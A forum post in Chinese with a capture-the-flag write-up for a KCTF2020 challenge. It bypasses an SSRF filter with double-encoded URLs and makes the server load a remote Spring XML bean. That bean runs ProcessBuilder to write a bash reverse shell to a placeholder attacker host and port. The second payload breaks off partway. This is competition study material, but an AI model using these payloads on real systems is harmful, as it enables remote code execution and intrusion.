首页
社区
课程
招聘
[原创]KCTF2020-秋季赛 第一题至暗时刻 WP
发表于: 2020-11-18 00:35 4406

[原创]KCTF2020-秋季赛 第一题至暗时刻 WP

2020-11-18 00:35
4406

通过

发现其存在过滤规则

考虑存在ssrf
拜读了一下作者的浅谈URL
简单测试了一下

图片描述
发现其报接口错误 而httpclient4没有这种报错
推测为httpclient3
使用httpclient3进行绕过
payload:

图片描述
发现成功绕过了这个过滤
再者,尝试注释中的loadconfig接口进行加载
图片描述
payload如下:

插入代码

图片描述
发现了一堆报错 不过没有关系 我们参考一下weblogic中的关于spring framwork的利用
并且在服务器端开了一个Python的服务器然后将xml挂在上面
payload:

同时监听端口 发现了get请求
证明可以出网 也可以进行利用

对payload进行构造

这是写shell文件的payload

这是执行文件的payload

分别执行 服务器设置监听端口 shell反弹回来

按照惯例先ls一下
图片描述

home 下的看看

图片描述

发现了jar文件 通过cat下载

下载下来拖进jd-gui中反编译

图片描述

得到flag:
flag{congratulations-Path-the-spring-boot}

部分源码:
图片描述
图片描述

http://121.36.145.157:8088/getimage?url=http://127.0.0.1
http://121.36.145.157:8088/getimage?url=http://127.0.0.1
^(http|https):\\/\\/[^?#\\/]*\\.pediy\\.com\\/.*
^(http|https):\\/\\/[^?#\\/]*\\.pediy\\.com\\/.*
http://121.36.145.157:8088/getimage?url=http://127.0.0.1:80xx.pediy.com/flag
http://121.36.145.157:8088/getimage?url=http://127.0.0.1:80xx.pediy.com/flag
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/flag
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/flag
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=x.xml
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=x.xml
 
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http://xxxx.xxxxx.xxxxx:8080/x.xml
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http://xxxx.xxxxx.xxxxx:8080/x.xml
 
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xmlns:context="http://www.springframework.org/schema/context"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
      http://www.springframework.org/schema/beans/spring-beans.xsd
      http://www.springframework.org/schema/context
      http://www.springframework.org/schema/context/spring-context.xsd">
 
    <!--    <bean id="est" class="fastjsonapplication.r00t4dm.est" init-method="estInit"/>-->
 
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
                <value><![CDATA[/bin/bash]]></value>
                <value><![CDATA[-c]]></value>
                <value><![CDATA[echo "bash -i >& /dev/tcp/{服务器IP}/{端口} 0>&1" > /tmp/shell.sh ]]></value>
            </list>
       </constructor-arg>
    </bean>
</beans>
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xmlns:context="http://www.springframework.org/schema/context"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
      http://www.springframework.org/schema/beans/spring-beans.xsd
      http://www.springframework.org/schema/context
      http://www.springframework.org/schema/context/spring-context.xsd">
 
    <!--    <bean id="est" class="fastjsonapplication.r00t4dm.est" init-method="estInit"/>-->
 
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2020-11-18 12:11 被CrazymanArmy编辑 ,原因:
收藏
免费 4
支持
分享
最新回复 (2)
雪    币: 1385
活跃值: (5609)
能力值: ( LV3,RANK:25 )
在线值:
发帖
回帖
粉丝
2
666
2020-11-19 14:46
0
雪    币: 5301
活跃值: (9873)
能力值: ( LV9,RANK:181 )
在线值:
发帖
回帖
粉丝
3
666
2020-11-19 14:55
0
游客
登录 | 注册 方可回帖
返回
//